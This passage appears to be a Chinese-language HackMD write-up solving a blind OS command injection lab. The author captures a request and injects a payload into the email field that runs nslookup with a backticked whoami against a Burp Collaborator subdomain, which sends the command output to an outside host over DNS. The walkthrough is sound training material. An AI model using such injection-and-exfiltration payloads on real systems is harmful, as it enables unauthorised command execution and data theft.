# OS command injection Lab5 這題上一題的進階版,不只要觸發命令,還要把 whoami 的輸出結果偷渡出來。 先進入網站然後攔截請求。   本提要發送 DNS,所以我們先去拿我們的子網域。 ``` 6597gkxmsqylh4qyxj7juuspdgj77zvo.oastify.com ``` 接著回來我們攔截的請求中,加上我們剛剛複製的子網域。  ``` email=||nslookup+`whoami`.6597gkxmsqylh4qyxj7juuspdgj77zvo.oastify.com|| ``` :::info ### 為什麼用 nslookup? 因為 nslookup(或 ping)會觸發一個 DNS 查詢,是最常見、最穩定的 OAST 利用方式,即便伺服器不允許回傳任何資料,我們也能偵測這個「外部互動」。 ::: 現在去看看我們的 DNS。  將剛剛得到的資訊送去給 Lab 中的答案框。   ---
×
Sign in
Email
Password
Forgot password
or
By clicking below, you agree to our
terms of service
.
Sign in via Facebook
Sign in via Twitter
Sign in via GitHub
Sign in via Dropbox
Sign in with Wallet
Wallet (
)
Connect another wallet
New to HackMD?
Sign up